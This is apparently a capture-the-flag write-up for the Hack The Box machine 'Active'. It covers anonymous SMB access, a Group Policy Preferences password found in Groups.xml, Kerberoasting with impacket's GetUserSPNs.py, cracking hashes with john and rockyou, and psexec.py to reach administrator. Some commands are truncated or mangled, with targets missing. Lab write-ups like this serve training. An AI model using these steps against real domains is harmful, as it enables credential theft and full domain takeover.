

After our nmap we see an SMB share, after trying out a few things we spot the replication share has anonymous enabled

after a recursive search we find a Groups.xml file with interesting details

after looking it up, we found this was a gpp file and to decrypt it was very easy:

now we need to access the share as SVC_TGS user to see if we have more privileges

smbclient -W -U SVC_TGS //
  • smbclient: This is the command-line tool for interacting with SMB servers.

  • -W The -W option is used to specify the workgroup or domain. In this case, the workgroup or domain is set to ""

  • -U SVC_TGS: The -U option is used to specify the username for the authentication. In this case, the username is set to "SVC_TGS."

  • // This part specifies the target SMB server and the share or directory on that server. In this case:

    • // This is the IP address (or hostname) of the SMB server.

    • /USERS: This is the name of the shared resource or directory on the server that you are trying to access.

Now let's look for some juicy files:

use john over hashcat for it to work:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

or another way to play it would've been to us GetUserSPN.py from impacket:

GetUserSPNs.py -request active.htb/SVC_TGS

put it in a hash.txt file and use john again:

john --wordlist=/usr/share/wordlists/rockyou.txt hashadmin.txt

Now we have 100 ways of going root but let's use psexec for this time:

psexec.py administrator@active.htbcd 

Last updated